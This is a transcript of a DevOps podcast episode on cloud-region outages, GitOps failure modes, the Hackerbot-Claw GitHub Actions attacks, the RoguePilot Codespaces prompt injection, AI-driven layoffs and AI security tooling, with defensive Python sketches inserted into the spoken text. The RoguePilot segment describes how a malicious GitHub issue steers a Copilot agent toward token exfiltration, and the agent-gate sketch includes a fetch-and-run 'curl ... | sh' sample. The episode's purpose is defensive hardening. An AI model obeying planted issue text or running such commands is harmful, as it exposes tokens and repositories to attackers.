AWS Bahrain/UAE Data Center Issues Amid Iran Strikes, ArgoCD vs Flux GitOps Failures, GitHub Actions Hackerbot-Claw Attacks (Trivy), RoguePilot Codespaces Prompt Injection, Block “AI Remake” Layoffs, Claude Code Security

Transcript

This week is another reminder that the boundary

of ops keeps expanding. Sometimes the incident

trigger isn't a bad deploy. It's physical disruption

in a cloud region. Sometimes it isn't your app.

It's your GitOps control plane getting stuck.

Sometimes it isn't a vuln in prod. It's your

CI getting actively hunted. And sometimes it's

your company saying AI remake while expecting

the same reliability with fewer humans. All right,

let's get into it. Hey, I'm Brian Teller. I work

in DevOps and SRE, and I run Teller's Tech. This

is Ship It Weekly, where I filter the noise and

focus on what actually changes how we run infrastructure

and own reliability. Show notes and links are

on shipitweekly.fm. If the show's been useful,

follow it wherever you listen. Also, ratings

help way more than they should. Six main stories

today, then the lightning round, and then the

human closer. Story 1 is AWS flagging issues

in Bahrain and the UAE data centers amid Iran's

strikes, and what this means for regional resilience.

Story 2 is Argo CD to Flux and the specific Argo

CD failure mode that makes GitOps feel like a

pager generator. Story 3 is Hackerbot-Claw, an

automated campaign exploiting GitHub Actions,

and Trivy getting hit as part of it. Story 4 is

RoguePilot, a GitHub Codespaces Copilot attack

chain. It's basically prompt injection meets real

credentials. Story 5 is Block cutting 4,000 jobs,

framed as an AI remake, and why that's an ops

execution story. Story 6 is Anthropic pushing

frontier cybersecurity capabilities for defenders,

and what that means when these tools move from

scan to suggest fixes. Then the lightning round,

then the human closer. All right, story one. So

Reuters reported AWS flagged power and connectivity

issues tied to incidents at facilities in the

UAE and Bahrain amid the regional conflict. The

practical takeaway is simple. Multi-AZ is not

multi-region, and cloud outages now include

physical risk. If the region is degraded for

hours or days, the question becomes, can you

operate elsewhere and how fast can you decide?

A lot of teams say we're highly available, and

what they really mean is we can lose an AZ. That's

great, you should do that. But it's not the same

as losing an entire region's capacity, networking,

or connectivity to the outside world. This is

where a DR plan stops being a diagram and becomes

a decision tree. Here's how this bites real orgs.

Your apps might technically still run, but your

dependencies don't. Payments provider timeouts.

Queue backlogs. Outbound traffic gets weird.

Latency goes from fine to unusable. And suddenly

you are in the ugly space where nothing is fully

down, but everything is failing. That's also

where people make the wrong call. They wait too

long because it's partially working. Then failover

gets harder because data divergence grows and

backlogs pile up. Do this Monday. Pick one region

you rely on heavily and run this thought experiment.

Assume it's impaired for 48 hours. Who makes

the failover call? Not "we would." A name or a

role. And what signals trigger it? Error rate?

Latency? Provider status? Customer impact? What's

the DNS plan? Do you use weighted routing? Failover

routing? Manual cutover? How long does it take?
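
To make the "what signals trigger it" question concrete, here's a minimal sketch in Python. It is not a definitive implementation: the field names, the thresholds, and the three outcomes ("stay", "prepare", "failover") are all assumptions made up for illustration, and nothing here comes from AWS or from the write-ups discussed in this episode. The point it shows is the one from a minute ago: partial failure needs a time limit, so "it's partially working" can't delay the call forever.

```python
from dataclasses import dataclass


@dataclass
class RegionSignals:
    """Point-in-time health signals for one region (all fields are illustrative)."""
    error_rate: float        # fraction of failed requests, 0.0 to 1.0
    p99_latency_ms: float    # observed p99 latency in milliseconds
    provider_degraded: bool  # provider status page reports an issue
    minutes_impaired: int    # how long the signals have looked bad


# Hypothetical thresholds; tune these to your own SLOs.
MAX_ERROR_RATE = 0.05
MAX_P99_LATENCY_MS = 2000.0
MAX_MINUTES_PARTIAL = 30


def failover_decision(s: RegionSignals) -> str:
    """Return 'stay', 'prepare', or 'failover' for the named decision owner."""
    unhealthy = (
        s.error_rate > MAX_ERROR_RATE or s.p99_latency_ms > MAX_P99_LATENCY_MS
    )
    if not unhealthy and not s.provider_degraded:
        return "stay"
    # Partial failure: don't wait indefinitely just because something still works.
    if unhealthy and s.minutes_impaired >= MAX_MINUTES_PARTIAL:
        return "failover"
    return "prepare"
```

The output is a recommendation for a person, not an automatic cutover. The name or role that owns the call still makes it.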

What's the rollback plan? What's the data plan?

Not the app plan. If your database is regional,

your app is regional. If your queue is regional,

your app is regional. If your identity system

is regional, your app is regional. Have you tested

this in the last year? Even a tabletop, even

a low-risk exercise, anything besides "we totally

could if we had to." If you are in edge regions

or high-risk geos, you don't get to pretend

this is theoretical. Next up, story two. Story

two is GitOps pain. There's a great write-up

on migrating from Argo CD to Flux, and the best

part is the section literally titled "The Problem

with Argo CD." The complaint is a specific failure

mode. A sync fails. Argo CD marks the app sync

failed, and then it can get stuck retrying the

failed state instead of progressing to the newer

commit that fixes it. The CRD ordering example

is the one everyone runs into at least once.
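
To make the ordering issue concrete, here's a small Python sketch. This is not Argo CD's or Flux's actual logic. It only illustrates why a batch that uses a custom kind before its CRD exists fails, and why putting CRDs first fixes it. The "Widget" kind and both function names are hypothetical.

```python
from typing import Any, Dict, List, Set

Manifest = Dict[str, Any]


def order_crds_first(manifests: List[Manifest]) -> List[Manifest]:
    """Return manifests with CustomResourceDefinitions ahead of everything else.

    sorted() is stable, so relative order inside each group is preserved.
    """
    return sorted(
        manifests, key=lambda m: m.get("kind") != "CustomResourceDefinition"
    )


def missing_crds(manifests: List[Manifest], builtin_kinds: Set[str]) -> List[str]:
    """List kinds that are used before anything in the batch defines them."""
    defined = set(builtin_kinds)
    missing = []
    for m in manifests:
        kind = m.get("kind")
        if kind == "CustomResourceDefinition":
            # spec.names.kind is the kind this CRD introduces.
            defined.add(m["spec"]["names"]["kind"])
        elif kind not in defined:
            missing.append(kind)
    return missing


batch = [
    {"kind": "Widget", "metadata": {"name": "w1"}},  # hypothetical custom resource
    {"kind": "CustomResourceDefinition", "spec": {"names": {"kind": "Widget"}}},
]
print(missing_crds(batch, {"Deployment"}))                    # the failing order
print(missing_crds(order_crds_first(batch), {"Deployment"}))  # CRDs applied first
```

In a real cluster the ordering is handled by whatever pattern you standardize on, such as sync waves, a separate CRD app, or pre-installing the CRDs. The sketch only shows the dependency those patterns exist to respect.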

You push a commit that creates a custom resource.

The CRD isn't there yet, so sync fails. You push

a new commit, adding the CRD. And Argo CD can

keep banging its head against the old failed

commit. This is the moment where GitOps stops

feeling like declarative desired state and starts

feeling like a controller stuck in a loop that

needs a human rescue. The fastest way to hate

GitOps is getting paged by GitOps. And here's

the thing. Argo CD is good. Lots of teams run

it successfully. But the operational footguns

are real. And if you haven't been burned yet,

you will be. GitOps tools are control planes.

When the control plane is wrong, it's not one

service down. It's your deployment mechanism

becoming the incident. So what do you actually

do with this story if you're not migrating to

Flux tomorrow? Do this Monday. If you run Argo

CD, make sure you have a runbook for "sync failed

and won't progress." What do you do when it's

stuck on a bad desired state? What's the break-glass

path that doesn't involve turning off all

automation? How do you handle CRDs and ordering

safely? Do you use sync waves? Do you split CRDs

into a separate app? Do you pre-install them?

Whatever your pattern is, write it down and standardize

it. And make sure the on-call knows the recovery

moves: manual sync, refresh, hard refresh, prune

behavior, deleting resources, recreating the app. The

mechanics matter when you're under pressure. Now,

on the Flux side: if you are considering Flux,

don't migrate your fleet first. Pick one low-risk

service. Run it side by side. Learn the failure

modes. Don't make this a religious war. Make

it an operational decision. All right, story three.

This story is spicy in the way ops teams should

care about. StepSecurity documented an automated

campaign they call Hackerbot-Claw. It targeted

GitHub Actions workflows across major repos, with

remote code execution in several targets and

token theft, including a token with write permissions.

Then Trivy maintainers posted their own incident

report saying Trivy was attacked via GitHub Actions

as part of the same campaign. And they believe

the vulnerability came from a specific workflow

which they fixed. This is the "your pipeline is

production" story. Attackers are not waiting for

your app to have a bug. They are going after

the thing that can publish artifacts, ship releases,

and mint trust. CI is basically a skeleton key

that we keep leaving under the doormat. The real

reason this matters for DevOps is that CI feels

internal, but it's usually triggered by public

inputs. PR titles, PR descriptions, issues, forks,

external contributors, and if any of that can

reach privileged execution, you have an internet-facing

execution engine with credentials. Do

this Monday. Open your workflows and look for

common footguns. Are you using pull_request_target?

If yes, do you fully understand which

code runs and what permissions it has? Are actions

pinned to commit SHAs or are you trusting tags?

Tags move, SHAs don't. Is GITHUB_TOKEN overprivileged?
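
The first few checks in this list (pull_request_target, tag-pinned actions, token permissions) can be roughed out as a tiny linter. This is a sketch under stated assumptions, not a real security scanner. It pattern-matches the raw workflow text with the standard library instead of parsing YAML, it only looks for a top-level permissions block, and the function name and warning wording are made up for illustration. The 40-character SHA in the usage example is a placeholder, not a real commit.

```python
import re
from typing import List

# A "uses:" reference pinned to a full 40-character commit SHA.
PINNED = re.compile(r"@[0-9a-f]{40}\b")
# Captures the reference after "uses:" on a step line.
USES = re.compile(r"^\s*(?:-\s*)?uses:\s*(\S+)", re.MULTILINE)


def lint_workflow(text: str) -> List[str]:
    """Return human-readable warnings for one workflow file's raw text."""
    warnings = []
    if re.search(r"\bpull_request_target\b", text):
        warnings.append(
            "uses pull_request_target: check which code runs with which token"
        )
    if not re.search(r"^permissions:", text, re.MULTILINE):
        warnings.append(
            "no top-level permissions block: token scope falls back to defaults"
        )
    for ref in USES.findall(text):
        # Local actions and docker:// references are skipped by this sketch.
        if ref.startswith("./") or ref.startswith("docker://"):
            continue
        if not PINNED.search(ref):
            warnings.append(f"action not pinned to a commit SHA: {ref}")
    return warnings


risky = """on: pull_request_target
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
"""

safe = """on: push
permissions:
  contents: read
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567
"""

for warning in lint_workflow(risky):
    print(warning)
```

A text match like this will miss things a YAML-aware tool would catch, so treat it as a starting point for the Monday review rather than a gate.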

Set default permissions to read-only and explicitly

grant what you need per job. Are secrets accessible

in contexts influenced by untrusted PRs? If untrusted

code can run in jobs with secrets, assume those

secrets are compromised eventually. Bonus hardening

that actually helps. Use OIDC to cloud providers

instead of long-lived cloud keys. Use environments

with required reviewers for deploy jobs. Separate

the untrusted test pipeline from the trusted publish

and deploy pipeline. If you do only one thing this

week, stop untrusted events from running privileged

steps. Okay, story four. This one is a perfect

bridge between "agents are real" and "credentials

are real." RoguePilot is an attack chain where

a malicious GitHub issue can embed instructions

that get processed when a developer launches

a Codespace from that issue. It's basically passive

prompt injection: the attacker's content is the

prompt. The scary part isn't "the model said something

weird." The scary part is the model can end up

operating in an environment that has real access,

like a GitHub token, and the attacker's instructions

can steer what it does. In the worst case, it ends

in token exfiltration and repo takeover.

This is exactly why agent boundaries are not

optional Untrusted text exists everywhere. Issues,

PRs, readmes, docs. If an agent reads it and

then can run commands, you need real trust boundaries.

Anything that reads issues is reading untrusted

input. Period. Do this Monday. If your org uses

Codespaces, Copilot-style agents, or anything

that can act, treat repo content as untrusted

input. Separate read context from act context.

Don't let the same agent both ingest and execute

without gates. Use least-privilege tokens in

dev environments. A developer workspace should

not have a token that can publish releases or

modify workflows. If you rely on external issues

and PRs, tighten who can trigger what. And make

sure you have logging that captures tool actions,

not just chat. This story will keep repeating

across tools. It's a category, not a one-off.
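
Here's one way "separate read context from act context" and "log tool actions, not just chat" might look, as a minimal Python sketch. Everything in it is an assumption for illustration: the ToolCall shape, the tool names, the read-only allowlist, and the idea that the surrounding system can flag when untrusted text influenced a call. It does not describe how Codespaces or Copilot work internally.

```python
import logging
from dataclasses import dataclass
from typing import Callable

logging.basicConfig(level=logging.INFO)
log = logging.getLogger("agent.tools")


@dataclass(frozen=True)
class ToolCall:
    """An action an agent wants to take (hypothetical structure)."""
    tool: str                   # e.g. "read_file", "run_shell", "push_commit"
    argument: str
    from_untrusted_input: bool  # True if issue/PR/README text influenced the call


# Hypothetical policy: tools that only read are allowed without review.
READ_ONLY_TOOLS = {"read_file", "list_files", "search_code"}


def gate(call: ToolCall, approve: Callable[[ToolCall], bool]) -> bool:
    """Decide whether a tool call may run, and log the decision either way."""
    if call.tool in READ_ONLY_TOOLS:
        allowed = True
    elif call.from_untrusted_input:
        # Acting on untrusted text requires an explicit human decision.
        allowed = approve(call)
    else:
        allowed = True
    log.info(
        "tool=%s arg=%r untrusted=%s allowed=%s",
        call.tool, call.argument, call.from_untrusted_input, allowed,
    )
    return allowed


def deny_all(call: ToolCall) -> bool:
    """Stand-in approver that refuses everything; a real one would ask a human."""
    return False


gate(ToolCall("run_shell", "curl example.invalid | sh", True), deny_all)
```

The gate is the trust boundary, and the log line is the audit trail. The hard part in practice is the taint flag, which this sketch simply assumes is available.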

All right, story five. So Block. If you're not

familiar, Block is the fintech company run by

Jack Dorsey. If the name sounds familiar, it's

because he's also the co-founder of Twitter

and one of the more influential figures in modern

tech platforms. Block used to be called Square.

It's the company behind things like Square Payments,

Cash App, and a bunch of fintech infrastructure

that powers small businesses and consumer payments.

So this isn't some random startup making headlines.

This is a large public tech company run by someone

who's been through multiple platform shifts already.

And now they're talking about what they're calling

an AI remake. Block is cutting around 4,000

jobs. This is not just an HR story for ops teams.

It's an execution story. Because the pattern

we're going to see everywhere is fewer humans,

higher output volume, same reliability expectations.

If AI increases code output, your safety net

has to scale too. That safety net is not hero

engineers. It's guardrails, ownership, and systems

that absorb change without constant babysitting.

"Small teams move fast" only works if your brakes

work. Here's the practical ops angle. When teams

shrink, you lose redundancy. On-call rotations

get thinner. Specialists disappear. And then

an incident hits and the blast radius of "we lost

that context" is massive. So if leadership is

pushing AI productivity, the immediate question

is, what are we doing to preserve safety? Do

this Monday. If your org is in AI productivity

mode, is your main protected with required checks

that are actually required? Are releases gated

in a way that matches risk? Do you have a real

rollback muscle? Is ownership clear when output

volume increases? Also, watch the human metrics.

On-call load, mean time to restore, number of

pages per week. If those go up while headcount

goes down, your system is signaling that the

brakes are failing. One more main story before

the lightning round. Anthropic announced Claude

Code Security in limited research preview. The

pitch: scan codebases for vulnerabilities and

suggest targeted patches for human review. This

is the direction the industry is moving. Security

work becomes part of the normal coding loop.

And if it works well, it can reduce backlog and

reduce time to fix. But the operational lesson

is the same as every agentic tool. Suggestion

mode is safe. Autonomous change is where you

need boundaries. If it can open PRs, it needs

the same rules as a human. So do this Monday.

If you are adopting AI security tooling, start

with suggestion mode. No auto-merge. Require

human approval for changes. Keep audit trails

of tool actions, not just a chat transcript.

Also, measure it like a real tool. How many findings

were real? How many were noise? Did it actually

reduce time to fix? Did it introduce risky changes?
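
Those four questions map onto a handful of numbers. Below is a minimal Python sketch of how you might tally them, assuming each finding gets triaged by a human. The Finding fields and the summary keys are hypothetical and not part of any vendor's tooling.

```python
from dataclasses import dataclass
from statistics import median
from typing import List, Optional


@dataclass
class Finding:
    """One triaged finding from a scanner (fields are illustrative)."""
    confirmed: bool                # a human judged it a real issue
    hours_to_fix: Optional[float]  # None if not fixed yet
    fix_caused_regression: bool = False


def summarize(findings: List[Finding]) -> dict:
    """Answer: how many were real, how many were noise, how fast, how risky."""
    total = len(findings)
    real = [f for f in findings if f.confirmed]
    fixed_hours = [f.hours_to_fix for f in real if f.hours_to_fix is not None]
    return {
        "total": total,
        "real": len(real),
        "noise": total - len(real),
        "precision": len(real) / total if total else 0.0,
        "median_hours_to_fix": median(fixed_hours) if fixed_hours else None,
        "risky_fixes": sum(f.fix_caused_regression for f in real),
    }


report = summarize([
    Finding(True, 4.0),
    Finding(True, 10.0, fix_caused_regression=True),
    Finding(False, None),
    Finding(True, None),
])
print(report)
```

Compare the median time to fix against your baseline from before the tool. Without that baseline, "did it reduce time to fix" can't be answered.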

Treat it like CI. Scoped access. Clear ownership.

And guardrails that prevent fixing by breaking

things. All right, time for the lightning round.

Quick, bigger-than-they-look stories.

DeepSeek reportedly withheld early access to

a new model from U.S. chipmakers while giving

Chinese firms early access. AI supply chains

are geopolitical now, and that impacts what you

can run where, and what best model even means.

Vercel wrote a great post on security boundaries

in agentic architectures. The core point? Most

agents run code with access to secrets, and without

explicit boundaries that becomes an incident generator.

Two CVE hits that are very DevOps/SRE relevant.

CISA added VMware Aria Operations CVE-2026-22719

to the KEV catalog, meaning active exploitation.

If you run Aria Ops, treat that as patch now.

And CVE-2026-27825 and CVE-2026-27826 in MCP Atlassian

are nasty because they live at the agent tooling

layer. SSRF-to-RCE-style chain. Exactly why agent

toolchains need the same rigor as any other

production system. And one more quick hit. Claude

Cowork scheduled tasks is the "agents in boring

workflows" story. Recurring automation is where

little mistakes turn into big messes. So you

want approvals, scope limits, and auditability.

All right, human closer. Quick credit where it's

due. If this episode feels like everything is

a control plane now, that's not just my opinion.

Uwe Friedrichsen has been writing about the ironies

of automation for a while, and we used that framing

in a prior Ship It Weekly episode, too. The idea

is simple. Automation doesn't remove responsibility.

It concentrates it. And as systems get faster,

human oversight doesn't magically speed up. You

can see it across everything we've covered. Physical

disruption in a region forces human decisions

under pressure. GitOps getting stuck forces humans

to rescue the control plane. CI being actively

exploited is literally "attack the automation."

Org changes, framed as AI remake, increase output

and reduce humans, which makes guardrails the

safety net. And AI security tooling is only a

win if boundaries and approvals stay intact.

So the takeaway is boring, but it's the job.

Guardrails are product work. You either build

brakes or you build faster incidents. All right,

that's it for this week of Ship It Weekly. AWS

issues in Bahrain and the UAE. Argo CD pain and

why Flux keeps coming up. GitHub Actions being

actively hunted and Trivy getting hit. RoguePilot

and prompt injection meeting real credentials.

Block's AI-driven layoffs as an execution risk

story. And Anthropic pushing AI security tooling

deeper into the dev workflow. Links and show

notes are on shipitweekly.fm. If this episode

was useful, hit follow or subscribe wherever

you listen. And share it with an ops friend who's

living in CI, GitOps, or AI everywhere right

now. I'm Brian, and I'll see you next week.
